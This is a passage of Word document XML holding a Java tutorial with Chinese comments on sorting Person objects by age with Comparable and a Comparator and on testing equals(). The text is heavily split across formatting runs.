          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>list</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>进行排序</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>        // DescAgeComparator</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>的排序方式是：根据</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>“age”</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>的降序排序</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>        Collections.sort(list, new DescAgeComparator());</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>        System.out.printf("Desc(age) sort, list:%s\n", list);</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        // </w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>判断两个</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>person</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>是否相等</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>        testEquals();</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>    }</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>    /**</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">     * @desc </w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>测试两个</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Person</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>比较是否相等。</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">     *   </w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>由于</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Person</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>实现了</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>equals()</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>函数：若两</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>person</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>age</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>都相等，则认为这两个</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>person</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>相等。</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">     *   </w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>所以，这里的</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>p1</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>p2</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>相等。</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>     *</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>     *   TODO</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>：若去掉</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Person</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>中的</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>equals()</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>函数，则</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>p1</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>不等于</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>p2</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>     */</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>    private static void testEquals() {</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>        Person p1 = new Person("eee", 100);</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>        Person p2 = new Person("eee", 100);</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>        if (p1.equals(p2)) {</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>            System.out.printf("%s EQUAL %s\n", p1, p2);</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>        } else {</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>            System.out.printf("%s NOT EQUAL %s\n", p1, p2);</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>        }</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>    }</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>    /**</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>     * @desc Person</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>类。</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>     *       Person</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>实现了</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Comparable</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>接口，这意味着</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Person</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>本身支持排序</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>     */</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>    private static class Person implements Comparable&lt;Person&gt;{</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>        int age;</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>        String name;</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>        public Person(String name, int age) {</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>            this.name = name;</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>            this.age = age;</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>        }</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>        public String getName() {</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>            return name;</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>        }</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>        public int getAge() {</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
